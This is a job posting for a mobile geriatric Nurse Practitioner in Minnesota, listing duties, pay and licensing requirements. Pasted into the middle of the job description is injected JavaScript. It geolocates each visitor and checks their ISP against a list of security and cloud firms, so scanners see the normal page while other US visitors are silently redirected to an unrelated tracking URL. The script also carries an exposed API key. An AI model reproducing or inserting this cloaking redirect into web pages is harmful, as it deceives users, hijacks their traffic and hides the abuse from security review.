Nurse Practitioner – Geriatric Primary Care (SNF, LTC, ALF)

Saint Paul, MN
January 22, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/c80ec975d641f5c6/6bef508e87b028c4f6c29db71e3098a8192d483bfdb89fa817af860335e7443b/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

We are seeking an experienced Nurse Practitioner for a mobile primary care role in Skilled Nursing Facilities, LTC, and ALFs across Minnesota.

  • Provide comprehensive primary care, manage acute and chronic conditions, perform assessments, and develop treatment plans.
  • Order diagnostics, prescribe medications, and educate patients, families, and staff.
  • Collaborate with healthcare teams to ensure seamless patient care and support quality improvement.

  • Benefits include a competitive salary ($100K–$140K), flexible scheduling, paid time off and holidays, CME allowance, insurance coverage, 401(k) match, malpractice insurance, and professional development.

    Qualifications include a current MN NP license, board certification, with preferred experience in geriatric and post-acute care. Strong communication and teamwork skills are essential.

    This full-time role offers autonomy, a supportive environment, and the opportunity to impact older adult care in post-acute settings.